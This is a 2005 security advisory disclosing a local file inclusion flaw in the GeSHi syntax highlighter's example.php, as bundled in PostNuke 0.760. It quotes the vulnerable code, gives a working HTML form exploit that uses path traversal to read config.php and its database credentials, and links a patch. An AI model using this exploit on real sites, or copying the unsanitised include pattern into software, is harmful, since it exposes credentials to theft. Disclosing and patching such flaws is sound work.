GeSHi.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[GeSHi Local PHP file inclusion 1.0.7.2]  
  
Author: Maksymilian Arciemowicz ( cXIb8O3 ).17  
Date: 21.9.2005  
from SECURITYREASON.COM  
  
- --- 0.Description ---  
  
GeSHi started as a mod for the phpBB forum system, to enable highlighting of  
more languages than the available (which was 0 ;)). However, it quickly  
spawned into an entire project on its own. But now it has been released, work  
continues on a mod for phpBB - and hopefully for many forum systems, blogs  
and other web-based systems.  
  
Several systems are using GeSHi now, including:  
  
PostNuke - A popular open source CMS  
Docuwiki - An advanced wiki engine  
gtk.php.net - Their manual uses GeSHi for syntax highlighting  
WordPress - A powerful blogging system  
PHP-Fusion - A constantly evovling CMS  
SQL Manager - A Postgres DBAL  
Mambo - A popular open source CMS  
MediaWiki - A leader in Wikis  
TikiWiki - A megapowerful Wiki/CMS, and one I personally use  
RWeb - A site-building tool  
  
- --- 1. Local (PHP) file inclusion ---  
I have found one bug in file ./contrib/example.php  
This file exists in standart packet GeSHi.  
In file:  
  
- -10-18-line---  
include('../geshi.php');  
if ( isset($_POST['submit']) )  
{  
if ( get_magic_quotes_gpc() ) $_POST['source'] =  
stripslashes($_POST['source']);  
if ( !strlen(trim($_POST['source'])) )  
{  
$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] .  
'.php'));  
$_POST['language'] = 'php';  
}  
- -10-18-line---  
  
Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can  
read any php file  
(for example in postnuke -config.php-).  
You need use varible $_POST['language'] wher is path to php file.  
I have tested this bug in GeSHi package and in PostNuke 0.760.  
  
PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)  
  
We can read config.php in PostNuke where we have login, password, dbname and  
dbhost.  
All variables needed to log in to database.  
So we can just use this exploit below :  
  
- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---  
<center><a href="http://securityreason.com"  
target="http://securityreason.com/"><img  
src="http://securityreason.com/gfx/small_logo.png"></a><p>  
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php"  
method="post">  
Path to file:<br>  
example: <b>../../../../config</b><br>  
<textarea name="language"></textarea><br>  
<input type="submit" name="submit" value="See">  
</form>  
- --- EXPLOIT FOR POSTNUKE 0.760 ---  
  
[HOST] = example. http://www.securityreason.com/postnuke/html  
any questions? ;]  
  
- --- 2. How to fix ---  
Patch  
http://securityreason.com/patch/2  
works in PostNuke 0.760  
  
or new version of script 1.0.7.3  
  
- --- 3. Greets ---  
  
sp3x  
  
- --- 4.Contact ---  
Author: Maksymilian Arciemowicz < cXIb8O3 >  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2 (FreeBSD)  
  
iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm  
MWVTap2Adcne2IMt7OpZHmM=  
=JulS  
-----END PGP SIGNATURE-----   
`